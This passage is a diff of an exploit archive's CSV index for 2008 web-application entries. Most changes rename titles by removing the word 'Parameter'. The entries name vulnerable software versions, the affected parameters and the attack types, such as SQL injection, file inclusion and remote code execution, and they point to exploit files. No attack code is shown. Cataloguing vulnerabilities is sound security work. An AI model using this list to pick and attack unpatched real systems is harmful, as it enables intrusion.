Injection",2008-07-21,Mr.SQL,asp,webapps,0 +6105,platforms/asp/webapps/6105.pl,"HRS Multi - 'key' Blind SQL Injection",2008-07-21,Mr.SQL,asp,webapps,0 6107,platforms/php/webapps/6107.txt,"Interact 2.4.1 - 'help.php' Local File Inclusion",2008-07-21,DSecRG,php,webapps,0 6108,platforms/cgi/webapps/6108.pl,"MojoClassifieds 2.0 - Blind SQL Injection",2008-07-21,Mr.SQL,cgi,webapps,0 6109,platforms/cgi/webapps/6109.pl,"MojoPersonals - Blind SQL Injection",2008-07-21,Mr.SQL,cgi,webapps,0 6110,platforms/cgi/webapps/6110.pl,"MojoJobs - Blind SQL Injection",2008-07-21,Mr.SQL,cgi,webapps,0 6111,platforms/cgi/webapps/6111.pl,"MojoAuto - Blind SQL Injection",2008-07-21,Mr.SQL,cgi,webapps,0 6112,platforms/php/webapps/6112.txt,"EZWebAlbum - Remote File Disclosure",2008-07-21,"Ghost Hacker",php,webapps,0 -6113,platforms/php/webapps/6113.pl,"Arctic Issue Tracker 2.0.0 - 'filter' Parameter SQL Injection (2)",2008-07-21,ldma,php,webapps,0 -6114,platforms/php/webapps/6114.txt,"ShopCartDx 4.30 - 'pid' Parameter SQL Injection",2008-07-21,Cr@zy_King,php,webapps,0 +6113,platforms/php/webapps/6113.pl,"Arctic Issue Tracker 2.0.0 - 'filter' SQL Injection (2)",2008-07-21,ldma,php,webapps,0 +6114,platforms/php/webapps/6114.txt,"ShopCartDx 4.30 - 'pid' SQL Injection",2008-07-21,Cr@zy_King,php,webapps,0 6115,platforms/php/webapps/6115.txt,"EZWebAlbum - Insecure Cookie Handling",2008-07-21,"Virangar Security",php,webapps,0 6117,platforms/php/webapps/6117.txt,"YouTube blog 0.1 - Remote File Inclusion / SQL Injection / Cross-Site Scripting",2008-07-22,Unohope,php,webapps,0 -6119,platforms/asp/webapps/6119.txt,"Pre Survey Poll - 'catid' Parameter SQL Injection",2008-07-22,DreamTurk,asp,webapps,0 -6125,platforms/php/webapps/6125.txt,"Atom Photoblog 1.1.5b1 - 'photoId' Parameter SQL Injection",2008-07-24,Mr.SQL,php,webapps,0 +6119,platforms/asp/webapps/6119.txt,"Pre Survey Poll - 'catid' SQL Injection",2008-07-22,DreamTurk,asp,webapps,0 +6125,platforms/php/webapps/6125.txt,"Atom Photoblog 1.1.5b1 - 'photoId' SQL Injection",2008-07-24,Mr.SQL,php,webapps,0 6126,platforms/php/webapps/6126.txt,"ibase 2.03 - Remote File Disclosure",2008-07-24,Dyshoo,php,webapps,0 6127,platforms/php/webapps/6127.htm,"WordPress Plugin Download Manager 0.2 - Arbitrary File Upload",2008-07-24,SaO,php,webapps,0 -6128,platforms/php/webapps/6128.txt,"Live Music Plus 1.1.0 - 'id' Parameter SQL Injection",2008-07-24,IRAQI,php,webapps,0 +6128,platforms/php/webapps/6128.txt,"Live Music Plus 1.1.0 - 'id' SQL Injection",2008-07-24,IRAQI,php,webapps,0 6131,platforms/php/webapps/6131.txt,"XRms 1.99.2 - Remote File Inclusion / Cross-Site Scripting / Information Gathering",2008-07-25,AzzCoder,php,webapps,0 -6132,platforms/php/webapps/6132.txt,"Camera Life 2.6.2 - 'id' Parameter SQL Injection",2008-07-25,nuclear,php,webapps,0 +6132,platforms/php/webapps/6132.txt,"Camera Life 2.6.2 - 'id' SQL Injection",2008-07-25,nuclear,php,webapps,0 6133,platforms/php/webapps/6133.txt,"FizzMedia 1.51.2 - SQL Injection",2008-07-25,Mr.SQL,php,webapps,0 6134,platforms/php/webapps/6134.txt,"PHPTest 0.6.3 - SQL Injection",2008-07-25,cOndemned,php,webapps,0 -6135,platforms/asp/webapps/6135.txt,"FipsCMS Light 2.1 - 'r' Parameter SQL Injection",2008-07-26,U238,asp,webapps,0 +6135,platforms/asp/webapps/6135.txt,"FipsCMS Light 2.1 - 'r' SQL Injection",2008-07-26,U238,asp,webapps,0 6136,platforms/php/webapps/6136.txt,"PHPwebnews 0.2 MySQL Edition - (SQL) Insecure Cookie Handling",2008-07-26,"Virangar Security",php,webapps,0 6137,platforms/php/webapps/6137.txt,"IceBB 1.0-RC9.2 - Blind SQL Injection / Session Hijacking Exploit",2008-07-26,girex,php,webapps,0 6138,platforms/php/webapps/6138.txt,"Mobius 1.4.4.1 - SQL Injection",2008-07-26,dun,php,webapps,0 -6139,platforms/php/webapps/6139.txt,"EPShop < 3.0 - 'pid' Parameter SQL Injection",2008-07-26,mikeX,php,webapps,0 +6139,platforms/php/webapps/6139.txt,"EPShop < 3.0 - 'pid' SQL Injection",2008-07-26,mikeX,php,webapps,0 6140,platforms/php/webapps/6140.txt,"phpLinkat 0.1 - Insecure Cookie Handling / SQL Injection",2008-07-26,Encrypt3d.M!nd,php,webapps,0 6141,platforms/php/webapps/6141.txt,"TriO 2.1 - 'browse.php' SQL Injection",2008-07-26,dun,php,webapps,0 -6142,platforms/php/webapps/6142.txt,"CMScout 2.05 - 'bit' Parameter Local File Inclusion",2008-07-27,"Khashayar Fereidani",php,webapps,0 -6143,platforms/php/webapps/6143.txt,"Getacoder clone - 'sb_protype' Parameter SQL Injection",2008-07-27,"Hussin X",php,webapps,0 -6144,platforms/php/webapps/6144.txt,"GC Auction Platinum - 'cate_id' Parameter SQL Injection",2008-07-27,"Hussin X",php,webapps,0 -6145,platforms/php/webapps/6145.txt,"SiteAdmin CMS - 'art' Parameter SQL Injection",2008-07-27,Cr@zy_King,php,webapps,0 +6142,platforms/php/webapps/6142.txt,"CMScout 2.05 - 'bit' Local File Inclusion",2008-07-27,"Khashayar Fereidani",php,webapps,0 +6143,platforms/php/webapps/6143.txt,"Getacoder clone - 'sb_protype' SQL Injection",2008-07-27,"Hussin X",php,webapps,0 +6144,platforms/php/webapps/6144.txt,"GC Auction Platinum - 'cate_id' SQL Injection",2008-07-27,"Hussin X",php,webapps,0 +6145,platforms/php/webapps/6145.txt,"SiteAdmin CMS - 'art' SQL Injection",2008-07-27,Cr@zy_King,php,webapps,0 6146,platforms/php/webapps/6146.txt,"Pligg CMS 9.9.0 - 'story.php' SQL Injection",2008-07-28,"Hussin X",php,webapps,0 6147,platforms/php/webapps/6147.txt,"Youtuber Clone - SQL Injection",2008-07-28,"Hussin X",php,webapps,0 6148,platforms/php/webapps/6148.txt,"TalkBack 2.3.5 - 'Language' Local File Inclusion",2008-07-28,NoGe,php,webapps,0 6149,platforms/php/webapps/6149.txt,"Dokeos E-Learning System 1.8.5 - Local File Inclusion",2008-07-28,DSecRG,php,webapps,0 -6150,platforms/php/webapps/6150.txt,"PixelPost 1.7.1 - 'language_full' Parameter Local File Inclusion",2008-07-28,DSecRG,php,webapps,0 +6150,platforms/php/webapps/6150.txt,"PixelPost 1.7.1 - 'language_full' Local File Inclusion",2008-07-28,DSecRG,php,webapps,0 6153,platforms/php/webapps/6153.txt,"ATutor 1.6.1-pl1 - 'import.php' Remote File Inclusion",2008-07-28,"Khashayar Fereidani",php,webapps,0 -6154,platforms/php/webapps/6154.txt,"ViArt Shop 3.5 - 'category_id' Parameter SQL Injection",2008-07-28,"GulfTech Security",php,webapps,0 -6156,platforms/php/webapps/6156.txt,"Minishowcase 09b136 - 'lang' Parameter Local File Inclusion",2008-07-29,DSecRG,php,webapps,0 +6154,platforms/php/webapps/6154.txt,"ViArt Shop 3.5 - 'category_id' SQL Injection",2008-07-28,"GulfTech Security",php,webapps,0 +6156,platforms/php/webapps/6156.txt,"Minishowcase 09b136 - 'lang' Local File Inclusion",2008-07-29,DSecRG,php,webapps,0 6158,platforms/php/webapps/6158.pl,"e107 Plugin BLOG Engine 2.2 - Blind SQL Injection",2008-07-29,"Virangar Security",php,webapps,0 6159,platforms/php/webapps/6159.txt,"Gregarius 0.5.4 - SQL Injection",2008-07-29,"GulfTech Security",php,webapps,0 6160,platforms/php/webapps/6160.txt,"PHP Hosting Directory 2.0 - Remote File Inclusion",2008-07-29,RoMaNcYxHaCkEr,php,webapps,0 6161,platforms/php/webapps/6161.txt,"HIOX Random Ad 1.3 - Remote File Inclusion",2008-07-30,"Ghost Hacker",php,webapps,0 6162,platforms/php/webapps/6162.txt,"HIOX Browser Statistics 2.0 - Remote File Inclusion",2008-07-30,"Ghost Hacker",php,webapps,0 6163,platforms/php/webapps/6163.txt,"PHP Hosting Directory 2.0 - Insecure Cookie Handling",2008-07-30,Stack,php,webapps,0 -6164,platforms/php/webapps/6164.txt,"nzFotolog 0.4.1 - 'action_file' Parameter Local File Inclusion",2008-07-30,"Khashayar Fereidani",php,webapps,0 +6164,platforms/php/webapps/6164.txt,"nzFotolog 0.4.1 - 'action_file' Local File Inclusion",2008-07-30,"Khashayar Fereidani",php,webapps,0 6165,platforms/php/webapps/6165.txt,"ZeeReviews - SQL Injection",2008-07-30,Mr.SQL,php,webapps,0 6166,platforms/php/webapps/6166.php,"HIOX Random Ad 1.3 - Arbitrary Add Admin",2008-07-30,Stack,php,webapps,0 6167,platforms/php/webapps/6167.txt,"Article Friendly Pro/Standard - SQL Injection",2008-07-30,Mr.SQL,php,webapps,0 6168,platforms/php/webapps/6168.php,"HIOX Browser Statistics 2.0 - Arbitrary Add Admin",2008-07-30,Stack,php,webapps,0 -6169,platforms/php/webapps/6169.txt,"PozScripts Classified Ads Script - 'cid' Parameter SQL Injection",2008-07-30,"Hussin X",php,webapps,0 -6170,platforms/php/webapps/6170.txt,"TubeGuru Video Sharing Script - 'UID' Parameter SQL Injection",2008-07-30,"Hussin X",php,webapps,0 +6169,platforms/php/webapps/6169.txt,"PozScripts Classified Ads Script - 'cid' SQL Injection",2008-07-30,"Hussin X",php,webapps,0 +6170,platforms/php/webapps/6170.txt,"TubeGuru Video Sharing Script - 'UID' SQL Injection",2008-07-30,"Hussin X",php,webapps,0 6171,platforms/php/webapps/6171.pl,"eNdonesia 8.4 (Calendar Module) - SQL Injection",2008-07-30,Jack,php,webapps,0 6172,platforms/php/webapps/6172.pl,"Pligg CMS 9.9.0 - Remote Code Execution",2008-07-30,"GulfTech Security",php,webapps,0 6173,platforms/php/webapps/6173.txt,"Pligg CMS 9.9.0 - Cross-Site Scripting / Local File Inclusion / SQL Injection",2008-07-30,"GulfTech Security",php,webapps,0 6176,platforms/php/webapps/6176.txt,"PHPX 3.5.16 - Cookie Poisoning / Login Bypass",2008-07-31,gnix,php,webapps,0 6177,platforms/php/webapps/6177.php,"Symphony 1.7.01 (non-patched) - Remote Code Execution",2008-07-31,Raz0r,php,webapps,0 6178,platforms/php/webapps/6178.php,"Coppermine Photo Gallery 1.4.18 - Local File Inclusion / Remote Code Execution",2008-07-31,EgiX,php,webapps,0 -6179,platforms/php/webapps/6179.txt,"LetterIt 2 - 'Language' Parameter Local File Inclusion",2008-07-31,NoGe,php,webapps,0 -6180,platforms/php/webapps/6180.txt,"phpMyRealty 2.0.0 - 'location' Parameter SQL Injection",2008-08-01,CraCkEr,php,webapps,0 +6179,platforms/php/webapps/6179.txt,"LetterIt 2 - 'Language' Local File Inclusion",2008-07-31,NoGe,php,webapps,0 +6180,platforms/php/webapps/6180.txt,"phpMyRealty 2.0.0 - 'location' SQL Injection",2008-08-01,CraCkEr,php,webapps,0 6182,platforms/php/webapps/6182.txt,"phpAuction GPL Enhanced 2.51 - 'profile.php' SQL Injection",2008-08-01,"Hussin X",php,webapps,0 -6183,platforms/php/webapps/6183.txt,"ABG Blocking Script 1.0a - 'abg_path' Parameter Remote File Inclusion",2008-08-01,Lo$er,php,webapps,0 -6184,platforms/php/webapps/6184.txt,"E-topbiz Dating 3 PHP Script - 'mail_id' Parameter SQL Injection",2008-08-01,Corwin,php,webapps,0 -6185,platforms/php/webapps/6185.txt,"Scripts24 iTGP 1.0.4 - 'id' Parameter SQL Injection",2008-08-01,Mr.SQL,php,webapps,0 -6186,platforms/php/webapps/6186.txt,"Scripts24 iPost 1.0.1 - 'id' Parameter SQL Injection",2008-08-01,Mr.SQL,php,webapps,0 -6187,platforms/php/webapps/6187.txt,"eStoreAff 0.1 - 'cid' Parameter SQL Injection",2008-08-01,Mr.SQL,php,webapps,0 -6189,platforms/php/webapps/6189.txt,"GreenCart PHP Shopping Cart - 'id' Parameter SQL Injection",2008-08-01,"Hussin X",php,webapps,0 +6183,platforms/php/webapps/6183.txt,"ABG Blocking Script 1.0a - 'abg_path' Remote File Inclusion",2008-08-01,Lo$er,php,webapps,0 +6184,platforms/php/webapps/6184.txt,"E-topbiz Dating 3 PHP Script - 'mail_id' SQL Injection",2008-08-01,Corwin,php,webapps,0 +6185,platforms/php/webapps/6185.txt,"Scripts24 iTGP 1.0.4 - 'id' SQL Injection",2008-08-01,Mr.SQL,php,webapps,0 +6186,platforms/php/webapps/6186.txt,"Scripts24 iPost 1.0.1 - 'id' SQL Injection",2008-08-01,Mr.SQL,php,webapps,0 +6187,platforms/php/webapps/6187.txt,"eStoreAff 0.1 - 'cid' SQL Injection",2008-08-01,Mr.SQL,php,webapps,0 +6189,platforms/php/webapps/6189.txt,"GreenCart PHP Shopping Cart - 'id' SQL Injection",2008-08-01,"Hussin X",php,webapps,0 6190,platforms/php/webapps/6190.txt,"phsBlog 0.1.1 - Multiple SQL Injections",2008-08-01,cOndemned,php,webapps,0 6191,platforms/php/webapps/6191.txt,"e-vision CMS 2.02 - SQL Injection / Arbitrary File Upload / Information Gathering",2008-08-02,"Khashayar Fereidani",php,webapps,0 6192,platforms/php/webapps/6192.txt,"k-links directory - SQL Injection / Cross-Site Scripting",2008-08-02,Corwin,php,webapps,0 -6193,platforms/php/webapps/6193.txt,"E-Store Kit-1 < 2 PayPal Edition - 'pid' Parameter SQL Injection",2008-08-02,Mr.SQL,php,webapps,0 +6193,platforms/php/webapps/6193.txt,"E-Store Kit-1 < 2 PayPal Edition - 'pid' SQL Injection",2008-08-02,Mr.SQL,php,webapps,0 6194,platforms/php/webapps/6194.pl,"moziloCMS 1.10.1 - 'download.php' Arbitrary Download File Exploit",2008-08-02,Ams,php,webapps,0 6199,platforms/php/webapps/6199.pl,"Joomla! Component EZ Store Remote - Blind SQL Injection",2008-08-03,His0k4,php,webapps,0 6200,platforms/php/webapps/6200.txt,"syzygyCMS 0.3 - 'index.php' Local File Inclusion",2008-08-03,SirGod,php,webapps,0 -6203,platforms/php/webapps/6203.txt,"Dayfox Blog 4 - Multiple Local File Inclusion",2008-08-04,"Virangar Security",php,webapps,0 +6203,platforms/php/webapps/6203.txt,"Dayfox Blog 4 - Multiple Local File Inclusions",2008-08-04,"Virangar Security",php,webapps,0 6204,platforms/php/webapps/6204.txt,"Plogger 3.0 - SQL Injection",2008-08-05,"GulfTech Security",php,webapps,0 6205,platforms/php/webapps/6205.txt,"iges CMS 2.0 - Cross-Site Scripting / SQL Injection",2008-08-05,BugReport.IR,php,webapps,0 6206,platforms/php/webapps/6206.txt,"LiteNews 0.1 - Insecure Cookie Handling",2008-08-05,Scary-Boys,php,webapps,0 -6207,platforms/php/webapps/6207.txt,"LiteNews 0.1 - 'id' Parameter SQL Injection",2008-08-05,Stack,php,webapps,0 -6208,platforms/php/webapps/6208.txt,"Multiple Wsn Products - Local File Inclusion / Code Execution",2008-08-06,otmorozok428,php,webapps,0 +6207,platforms/php/webapps/6207.txt,"LiteNews 0.1 - 'id' SQL Injection",2008-08-05,Stack,php,webapps,0 +6208,platforms/php/webapps/6208.txt,"Wsn (Multiple Products) - Local File Inclusion / Code Execution",2008-08-06,otmorozok428,php,webapps,0 6209,platforms/php/webapps/6209.rb,"LoveCMS 1.6.2 Final - Remote Code Execution",2008-08-06,PoMdaPiMp,php,webapps,0 6210,platforms/php/webapps/6210.rb,"LoveCMS 1.6.2 Final - Update Settings Remote Exploit",2008-08-06,PoMdaPiMp,php,webapps,0 6211,platforms/php/webapps/6211.txt,"Quate CMS 0.3.4 - Local File Inclusion / Cross-Site Scripting",2008-08-06,CraCkEr,php,webapps,0 6213,platforms/php/webapps/6213.txt,"Free Hosting Manager 1.2/2.0 - Insecure Cookie Handling",2008-08-06,Scary-Boys,php,webapps,0 -6214,platforms/php/webapps/6214.php,"Discuz! 6.0.1 - 'searchid' Parameter SQL Injection",2008-08-06,james,php,webapps,0 +6214,platforms/php/webapps/6214.php,"Discuz! 6.0.1 - 'searchid' SQL Injection",2008-08-06,james,php,webapps,0 6215,platforms/php/webapps/6215.txt,"pPIM 1.0 - Arbitrary File Delete / Cross-Site Scripting",2008-08-10,BeyazKurt,php,webapps,0 6219,platforms/php/webapps/6219.txt,"e107 < 0.7.11 - Arbitrary Variable Overwriting",2008-08-10,"GulfTech Security",php,webapps,0 -6221,platforms/php/webapps/6221.txt,"Vacation Rental Script 3.0 - 'id' Parameter SQL Injection",2008-08-10,CraCkEr,php,webapps,0 +6221,platforms/php/webapps/6221.txt,"Vacation Rental Script 3.0 - 'id' SQL Injection",2008-08-10,CraCkEr,php,webapps,0 6223,platforms/php/webapps/6223.php,"Quicksilver Forums 1.4.1 - SQL Injection",2008-08-10,irk4z,php,webapps,0 6224,platforms/php/webapps/6224.txt,"txtSQL 2.2 Final - 'startup.php' Remote File Inclusion",2008-08-10,CraCkEr,php,webapps,0 6225,platforms/php/webapps/6225.txt,"PHP-Ring Webring System 0.9.1 - Insecure Cookie Handling",2008-08-10,"Virangar Security",php,webapps,0 6226,platforms/php/webapps/6226.txt,"psipuss 1.0 - Multiple SQL Injections",2008-08-10,"Virangar Security",php,webapps,0 6228,platforms/php/webapps/6228.txt,"OpenImpro 1.1 - 'image.php' SQL Injection",2008-08-10,nuclear,php,webapps,0 -6230,platforms/php/webapps/6230.txt,"ZeeBuddy 2.1 - 'adid' Parameter SQL Injection",2008-08-11,"Hussin X",php,webapps,0 +6230,platforms/php/webapps/6230.txt,"ZeeBuddy 2.1 - 'adid' SQL Injection",2008-08-11,"Hussin X",php,webapps,0 6231,platforms/php/webapps/6231.txt,"pPIM 1.0 - upload/change Password",2008-08-11,Stack,php,webapps,0 -6232,platforms/php/webapps/6232.txt,"Ovidentia 6.6.5 - 'item' Parameter SQL Injection",2008-08-11,"Khashayar Fereidani",php,webapps,0 -6233,platforms/php/webapps/6233.txt,"BBlog 0.7.6 - 'mod' Parameter SQL Injection",2008-08-12,IP-Sh0k,php,webapps,0 +6232,platforms/php/webapps/6232.txt,"Ovidentia 6.6.5 - 'item' SQL Injection",2008-08-11,"Khashayar Fereidani",php,webapps,0 +6233,platforms/php/webapps/6233.txt,"BBlog 0.7.6 - 'mod' SQL Injection",2008-08-12,IP-Sh0k,php,webapps,0 6234,platforms/php/webapps/6234.txt,"Joomla! 1.5.x - 'Token' Remote Admin Change Password",2008-08-12,d3m0n,php,webapps,0 -6235,platforms/php/webapps/6235.txt,"gelato CMS 0.95 - 'img' Parameter Remote File Disclosure",2008-08-13,JIKO,php,webapps,0 -6247,platforms/php/webapps/6247.txt,"dotCMS 1.6 - 'id' Parameter Local File Inclusion",2008-08-15,Don,php,webapps,0 -6249,platforms/php/webapps/6249.txt,"Zeeways ZeeJobsite 2.0 - 'adid' Parameter SQL Injection",2008-08-15,"Hussin X",php,webapps,0 +6235,platforms/php/webapps/6235.txt,"gelato CMS 0.95 - 'img' Remote File Disclosure",2008-08-13,JIKO,php,webapps,0 +6247,platforms/php/webapps/6247.txt,"dotCMS 1.6 - 'id' Local File Inclusion",2008-08-15,Don,php,webapps,0 +6249,platforms/php/webapps/6249.txt,"Zeeways ZeeJobsite 2.0 - 'adid' SQL Injection",2008-08-15,"Hussin X",php,webapps,0 6250,platforms/php/webapps/6250.txt,"deeemm CMS (dmcms) 0.7.4 - Multiple Vulnerabilities",2008-08-15,"Khashayar Fereidani",php,webapps,0 -6254,platforms/php/webapps/6254.txt,"XNova 0.8 sp1 - 'xnova_root_path' Parameter Remote File Inclusion",2008-08-17,NuclearHaxor,php,webapps,0 -6255,platforms/php/webapps/6255.txt,"phpArcadeScript 4 - 'cat' Parameter SQL Injection",2008-08-17,"Hussin X",php,webapps,0 -6258,platforms/php/webapps/6258.txt,"PHPBasket - 'pro_id' Parameter SQL Injection",2008-08-17,r45c4l,php,webapps,0 +6254,platforms/php/webapps/6254.txt,"XNova 0.8 sp1 - 'xnova_root_path' Remote File Inclusion",2008-08-17,NuclearHaxor,php,webapps,0 +6255,platforms/php/webapps/6255.txt,"phpArcadeScript 4 - 'cat' SQL Injection",2008-08-17,"Hussin X",php,webapps,0 +6258,platforms/php/webapps/6258.txt,"PHPBasket - 'pro_id' SQL Injection",2008-08-17,r45c4l,php,webapps,0 6259,platforms/php/webapps/6259.txt,"VidiScript (Avatar) - Arbitrary File Upload",2008-08-18,InjEctOr5,php,webapps,0 6260,platforms/php/webapps/6260.txt,"cyberBB 0.6 - Multiple SQL Injections",2008-08-18,cOndemned,php,webapps,0 6261,platforms/php/webapps/6261.txt,"PHP live helper 2.0.1 - Multiple Vulnerabilities",2008-08-18,"GulfTech Security",php,webapps,0 6269,platforms/cgi/webapps/6269.txt,"TWiki 4.2.0 - (configure) Remote File Disclosure",2008-08-19,Th1nk3r,cgi,webapps,0 -6270,platforms/php/webapps/6270.txt,"Affiliate Directory - 'id' Parameter SQL Injection",2008-08-19,"Hussin X",php,webapps,0 -6271,platforms/php/webapps/6271.txt,"Ad Board - 'id' Parameter SQL Injection",2008-08-19,"Hussin X",php,webapps,0 -6273,platforms/php/webapps/6273.txt,"SunShop Shopping Cart 4.1.4 - 'id' Parameter SQL Injection",2008-08-19,"GulfTech Security",php,webapps,0 -6276,platforms/php/webapps/6276.txt,"Banner Management Script - 'id' Parameter SQL Injection",2008-08-19,S.W.A.T.,php,webapps,0 +6270,platforms/php/webapps/6270.txt,"Affiliate Directory - 'id' SQL Injection",2008-08-19,"Hussin X",php,webapps,0 +6271,platforms/php/webapps/6271.txt,"Ad Board - 'id' SQL Injection",2008-08-19,"Hussin X",php,webapps,0 +6273,platforms/php/webapps/6273.txt,"SunShop Shopping Cart 4.1.4 - 'id' SQL Injection",2008-08-19,"GulfTech Security",php,webapps,0 +6276,platforms/php/webapps/6276.txt,"Banner Management Script - 'id' SQL Injection",2008-08-19,S.W.A.T.,php,webapps,0 6277,platforms/php/webapps/6277.txt,"Active PHP BookMarks 1.1.02 - SQL Injection",2008-08-19,"Hussin X",php,webapps,0 6279,platforms/php/webapps/6279.pl,"Pars4U Videosharing 1.0 - Cross-Site Scripting / Blind SQL Injection",2008-08-20,Mr.SQL,php,webapps,0 -6280,platforms/php/webapps/6280.txt,"phpBazar 2.0.2 - 'adid' Parameter SQL Injection",2008-08-20,e.wiZz!,php,webapps,0 -6281,platforms/php/webapps/6281.pl,"webEdition CMS - 'we_objectID' Parameter Blind SQL Injection",2008-08-20,Lidloses_Auge,php,webapps,0 +6280,platforms/php/webapps/6280.txt,"phpBazar 2.0.2 - 'adid' SQL Injection",2008-08-20,e.wiZz!,php,webapps,0 +6281,platforms/php/webapps/6281.pl,"webEdition CMS - 'we_objectID' Blind SQL Injection",2008-08-20,Lidloses_Auge,php,webapps,0 6284,platforms/php/webapps/6284.txt,"CustomCMS 4.0 - 'print.php' SQL Injection",2008-08-21,~!Dok_tOR!~,php,webapps,0 6285,platforms/php/webapps/6285.txt,"Photocart 3.9 - Multiple SQL Injections",2008-08-21,~!Dok_tOR!~,php,webapps,0 6286,platforms/php/webapps/6286.txt,"BandSite CMS 1.1.4 - Download Backup / Cross-Site Scripting / Cross-Site Request Forgery",2008-08-21,SirGod,php,webapps,0 @@ -20109,12 +20110,12 @@ id,file,description,date,author,platform,type,port 6295,platforms/php/webapps/6295.txt,"MiaCMS 4.6.5 - Multiple SQL Injections",2008-08-24,~!Dok_tOR!~,php,webapps,0 6296,platforms/php/webapps/6296.txt,"BtiTracker 1.4.7 / xbtit 2.0.542 - SQL Injection",2008-08-25,InATeam,php,webapps,0 6297,platforms/php/webapps/6297.txt,"Matterdaddy Market 1.1 - 'index.php' Multiple SQL Injections",2008-08-25,~!Dok_tOR!~,php,webapps,0 -6298,platforms/php/webapps/6298.txt,"Web Directory Script 2.0 - 'name' Parameter SQL Injection",2008-08-25,~!Dok_tOR!~,php,webapps,0 -6300,platforms/php/webapps/6300.txt,"Pluck CMS 4.5.2 - Multiple Local File Inclusion",2008-08-25,DSecRG,php,webapps,0 -6301,platforms/php/webapps/6301.txt,"EZContents CMS 2.0.3 - Multiple Local File Inclusion",2008-08-25,DSecRG,php,webapps,0 +6298,platforms/php/webapps/6298.txt,"Web Directory Script 2.0 - 'name' SQL Injection",2008-08-25,~!Dok_tOR!~,php,webapps,0 +6300,platforms/php/webapps/6300.txt,"Pluck CMS 4.5.2 - Multiple Local File Inclusions",2008-08-25,DSecRG,php,webapps,0 +6301,platforms/php/webapps/6301.txt,"EZContents CMS 2.0.3 - Multiple Local File Inclusions",2008-08-25,DSecRG,php,webapps,0 6303,platforms/php/webapps/6303.txt,"WebBoard 2.0 - Arbitrary SQL Question/Anwser Delete",2008-08-25,t0pP8uZz,php,webapps,0 6306,platforms/php/webapps/6306.pl,"GeekLog 1.5.0 - Arbitrary File Upload",2008-08-25,t0pP8uZz,php,webapps,0 -6307,platforms/php/webapps/6307.txt,"Crafty Syntax Live Help 2.14.6 - 'department' Parameter SQL Injection",2008-08-25,"GulfTech Security",php,webapps,0 +6307,platforms/php/webapps/6307.txt,"Crafty Syntax Live Help 2.14.6 - 'department' SQL Injection",2008-08-25,"GulfTech Security",php,webapps,0 6309,platforms/php/webapps/6309.txt,"z-breaknews 2.0 - 'single.php' SQL Injection",2008-08-26,cOndemned,php,webapps,0 6310,platforms/php/webapps/6310.txt,"Kolifa.net Download Script 1.2 - 'id' SQL Injection",2008-08-26,Kacak,php,webapps,0 6311,platforms/php/webapps/6311.php,"Simple PHP Blog (SPHPBlog) 0.5.1 - Code Execution",2008-08-26,mAXzA,php,webapps,0 @@ -20127,80 +20128,80 @@ id,file,description,date,author,platform,type,port 6321,platforms/php/webapps/6321.txt,"Yourownbux 3.1/3.2 Beta - SQL Injection",2008-08-27,~!Dok_tOR!~,php,webapps,0 6325,platforms/php/webapps/6325.php,"Invision Power Board 2.3.5 - Multiple Vulnerabilities (2)",2008-08-29,DarkFig,php,webapps,0 6332,platforms/php/webapps/6332.txt,"Brim 2.0.0 - SQL Injection / Cross-Site Scripting",2008-08-30,InjEctOr5,php,webapps,0 -6335,platforms/php/webapps/6335.txt,"Web Directory Script 1.5.3 - 'site' Parameter SQL Injection",2008-08-31,"Hussin X",php,webapps,0 -6336,platforms/php/webapps/6336.txt,"Words tag script 1.2 - 'word' Parameter SQL Injection",2008-08-31,"Hussin X",php,webapps,0 +6335,platforms/php/webapps/6335.txt,"Web Directory Script 1.5.3 - 'site' SQL Injection",2008-08-31,"Hussin X",php,webapps,0 +6336,platforms/php/webapps/6336.txt,"Words tag script 1.2 - 'word' SQL Injection",2008-08-31,"Hussin X",php,webapps,0 6338,platforms/php/webapps/6338.txt,"myPHPNuke < 1.8.8_8rc2 - Cross-Site Scripting / SQL Injection",2008-08-31,MustLive,php,webapps,0 6339,platforms/php/webapps/6339.txt,"webid 0.5.4 - Multiple Vulnerabilities",2008-08-31,InjEctOr5,php,webapps,0 6341,platforms/php/webapps/6341.txt,"WeBid 0.5.4 - 'item.php' SQL Injection",2008-09-01,Stack,php,webapps,0 -6342,platforms/php/webapps/6342.txt,"EasyClassifields 3.0 - 'go' Parameter SQL Injection",2008-09-01,e.wiZz!,php,webapps,0 -6343,platforms/php/webapps/6343.txt,"CMSbright - 'id_rub_page' Parameter SQL Injection",2008-09-01,"BorN To K!LL",php,webapps,0 +6342,platforms/php/webapps/6342.txt,"EasyClassifields 3.0 - 'go' SQL Injection",2008-09-01,e.wiZz!,php,webapps,0 +6343,platforms/php/webapps/6343.txt,"CMSbright - 'id_rub_page' SQL Injection",2008-09-01,"BorN To K!LL",php,webapps,0 6344,platforms/php/webapps/6344.php,"WeBid 0.5.4 - 'FCKeditor' Arbitrary File Upload",2008-09-01,Stack,php,webapps,0 -6346,platforms/php/webapps/6346.pl,"e107 Plugin BLOG Engine 2.2 - 'uid' Parameter SQL Injection",2008-09-01,"Virangar Security",php,webapps,0 -6347,platforms/php/webapps/6347.txt,"myPHPNuke < 1.8.8_8rc2 - 'artid' Parameter SQL Injection",2008-09-02,MustLive,php,webapps,0 -6348,platforms/php/webapps/6348.txt,"Coupon Script 4.0 - 'id' Parameter SQL Injection",2008-09-02,"Hussin X",php,webapps,0 -6349,platforms/php/webapps/6349.txt,"Reciprocal Links Manager 1.1 - 'site' Parameter SQL Injection",2008-09-02,"Hussin X",php,webapps,0 +6346,platforms/php/webapps/6346.pl,"e107 Plugin BLOG Engine 2.2 - 'uid' SQL Injection",2008-09-01,"Virangar Security",php,webapps,0 +6347,platforms/php/webapps/6347.txt,"myPHPNuke < 1.8.8_8rc2 - 'artid' SQL Injection",2008-09-02,MustLive,php,webapps,0 +6348,platforms/php/webapps/6348.txt,"Coupon Script 4.0 - 'id' SQL Injection",2008-09-02,"Hussin X",php,webapps,0 +6349,platforms/php/webapps/6349.txt,"Reciprocal Links Manager 1.1 - 'site' SQL Injection",2008-09-02,"Hussin X",php,webapps,0 6350,platforms/php/webapps/6350.txt,"AJ HYIP ACME - 'comment.php' SQL Injection",2008-09-02,"security fears team",php,webapps,0 6351,platforms/php/webapps/6351.txt,"AJ HYIP ACME - 'readarticle.php' SQL Injection",2008-09-02,InjEctOr5,php,webapps,0 6352,platforms/php/webapps/6352.txt,"CS-Cart 1.3.5 - Authentication Bypass",2008-09-02,"GulfTech Security",php,webapps,0 -6354,platforms/php/webapps/6354.txt,"Spice Classifieds - 'cat_path' Parameter SQL Injection",2008-09-03,InjEctOr5,php,webapps,0 +6354,platforms/php/webapps/6354.txt,"Spice Classifieds - 'cat_path' SQL Injection",2008-09-03,InjEctOr5,php,webapps,0 